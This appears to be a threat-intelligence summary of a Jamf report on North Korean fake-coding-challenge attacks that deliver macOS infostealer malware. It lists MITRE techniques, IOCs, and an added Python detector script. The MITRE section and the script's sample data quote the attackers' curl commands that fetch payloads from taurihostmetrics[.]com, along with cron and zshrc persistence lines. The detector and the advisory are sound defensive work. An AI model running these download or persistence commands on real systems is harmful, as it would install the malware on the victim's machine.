Jamf Threat Labs reports targeted attacks in the crypto sector where North Korea uses social engineering on professional networks to deliver malware disguised as coding challenges. The campaign features two main payloads, VisualStudioHelper and zsh_env, linked to Thiefbucket (Rustdoor) with infostealer and backdoor capabilities, and persistence via cron or zshrc; training employees to ignore unsolicited software requests is advised. #DPRK #NorthKorea #Thiefbucket #Rustdoor #VisualStudioHelper #zsh_env #LinkedIn #StonFi #taurihostmetrics #wiresapplication
Keypoints
- The FBI warned that North Korea is targeting individuals in the crypto industry with social engineering.
- Attacks typically begin with outreach on professional networking sites like LinkedIn.
- Malware is delivered through fake job offers and coding challenges.
- Two main payloads are identified: VisualStudioHelper and zsh_env, with similar functions but different persistence methods.
- Thiefbucket (Rustdoor) is associated with these attacks and has infostealer capabilities.
- Organizations should train employees to be cautious of unsolicited requests to run software.
MITRE Techniques
- [T1566] Social Engineering – Initial Access – Impersonation and social media reconnaissance to target victims. – “Before initiating contact, the actors scout prospective victims by reviewing social media activity, particularly on professional networking or employment-related platforms.”
- [T1059] Command and Scripting Interpreter – Execution – Use of bash to download and run payloads from coding challenges. – “bash -c 'cd /Users/$USER/Library/ …; curl -O -s https://taurihostmetrics[.]com/cloud/VisualStudioHelper …'”
- [T1105] Ingress Tool Transfer – Downloading second-stage payloads from remote hosts. – “curl -O -s https://taurihostmetrics[.]com/cloud/VisualStudioHelper” and “curl -O -s https://taurihostmetrics[.]com/cloud/zsh_env”
- [T1053] Cron – Persistence – VisualStudioHelper persists via cron. – “The VisualStudioHelper will persist via cron …”
- [T1204] User Execution – Credential Access – Prompting users for their password via a deceptive dialog box. – “dialog window tailored to look as though it originated from Visual Studio” (the context of the password prompt)
- [T1071] Command and Control – C2 – Malware communicates with command and control servers. – “communicates with command and control servers.”
Indicators of Compromise
- [Domain] Payload-hosting and C2 domains – taurihostmetrics[.]com, wiresapplication[.]com, juchesoviet48[.]com
- [IP Address] Public IP endpoints used by the attackers – 139.59.182[.]234, 62.204.41[.]73, 185.234.216[.]180
- [File Hash] Stage payloads and artifacts – 51a88646f9770e09b3505bd5cbadc587abb952ba, f669fba857401406db6b35958d5f57d9d8030f56
- [File] VisualStudioHelper, zsh_env, Project.zip (Coding Challenge)
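As an added example (this is not code from Jamf Threat Labs or from the report), the indicators above and the two persistence locations the report names can be turned into a small host-side check. The script matches shell history or log lines against the listed domains, IPs and file names, flags the "curl -O … https://host/…" download shape quoted under T1059/T1105 (the host is captured so the rule also fires on an unlisted domain, which is an editor's generalization of the report's single example), checks crontab and ~/.zshrc content for references to the payload names, and compares a file's SHA-1 with the listed hashes. The SAMPLE_* inputs are constructed, and the /Users/jdoe path is hypothetical.

```python
import hashlib
import re

# Indicators listed in the report above, with the defanged "[.]" written as a real dot
# so they match raw shell history, logs and config files.
IOC_DOMAINS = {"taurihostmetrics.com", "wiresapplication.com", "juchesoviet48.com"}
IOC_IPS = {"139.59.182.234", "62.204.41.73", "185.234.216.180"}
IOC_SHA1 = {
    "51a88646f9770e09b3505bd5cbadc587abb952ba",
    "f669fba857401406db6b35958d5f57d9d8030f56",
}
IOC_FILENAMES = {"VisualStudioHelper", "zsh_env", "Project.zip"}

# Shape of the download stage quoted under T1059/T1105: curl writing a remote file to
# disk (-O or -o given before the URL). The host is captured so the rule still fires
# if a fresh domain replaces the known one (editor's generalization).
CURL_FILE_DOWNLOAD = re.compile(
    r"\bcurl\b[^|;&]*?\s-[A-Za-z]*[oO][A-Za-z]*\s[^|;&]*?https?://([A-Za-z0-9.-]+)/"
)


def refang(text: str) -> str:
    """Turn defanged notation such as "example[.]com" back into a matchable host name."""
    return text.replace("[.]", ".")


def scan_line(line: str) -> list[str]:
    """Return the reasons one shell-history or log line is suspicious ([] if clean)."""
    line = refang(line)
    reasons = []
    for domain in sorted(IOC_DOMAINS):
        if domain in line:
            reasons.append(f"ioc-domain:{domain}")
    for ip in sorted(IOC_IPS):
        if ip in line:
            reasons.append(f"ioc-ip:{ip}")
    for name in sorted(IOC_FILENAMES):
        if name in line:
            reasons.append(f"ioc-file:{name}")
    match = CURL_FILE_DOWNLOAD.search(line)
    if match:
        reasons.append(f"curl-file-download:{match.group(1)}")
    return reasons


def scan_history(lines: list[str]) -> list[dict]:
    """Run scan_line over shell history and keep only the lines that produced a hit."""
    findings = []
    for number, line in enumerate(lines, 1):
        reasons = scan_line(line)
        if reasons:
            findings.append({"line": number, "text": line, "reasons": reasons})
    return findings


def scan_persistence(crontab_lines: list[str], zshrc_lines: list[str]) -> list[dict]:
    """Report cron entries and zshrc lines that reference the named payloads.

    The report says VisualStudioHelper persists via cron and zsh_env via zshrc, so both
    locations are checked against the same file-name indicators. Comments are skipped.
    """
    findings = []
    for source, lines in (("crontab", crontab_lines), ("zshrc", zshrc_lines)):
        for number, line in enumerate(lines, 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            hits = [name for name in sorted(IOC_FILENAMES) if name in stripped]
            if hits:
                findings.append({"source": source, "line": number, "files": hits})
    return findings


def sha1_is_known_payload(data: bytes) -> bool:
    """True if the SHA-1 of the given file content is one of the report's payload hashes."""
    return hashlib.sha1(data).hexdigest() in IOC_SHA1


# Constructed sample input (not taken from a real host): one benign clone, the two
# download commands in the shape the report quotes, and a benign curl with no output flag.
SAMPLE_HISTORY = [
    "git clone https://github.com/example/project.git",
    "bash -c 'cd /Users/$USER/Library/; curl -O -s https://taurihostmetrics.com/cloud/VisualStudioHelper'",
    "curl -O -s https://taurihostmetrics.com/cloud/zsh_env",
    "curl -sSL https://example.com/health",
]
# Constructed crontab and ~/.zshrc content; the /Users/jdoe path is hypothetical.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/10 * * * * /Users/jdoe/Library/VisualStudioHelper",
]
SAMPLE_ZSHRC = [
    "export PATH=$HOME/bin:$PATH",
    "alias ll='ls -la'",
    "source $HOME/Library/zsh_env",
]

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(f"history line {finding['line']}: {', '.join(finding['reasons'])}")
    for finding in scan_persistence(SAMPLE_CRONTAB, SAMPLE_ZSHRC):
        print(f"{finding['source']} line {finding['line']}: references {finding['files']}")
    print("sample bytes match a known payload hash:", sha1_is_known_payload(b"not the payload"))
```

On a real Mac the inputs would come from ~/.zsh_history, `crontab -l` and ~/.zshrc rather than the constructed lists; the string matching is deliberately simple, so treat a hit as a trigger for triage (which process wrote the file, what the cron entry runs, whether the SHA-1 of the file in ~/Library matches) rather than as proof of compromise.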
Read more: https://www.jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/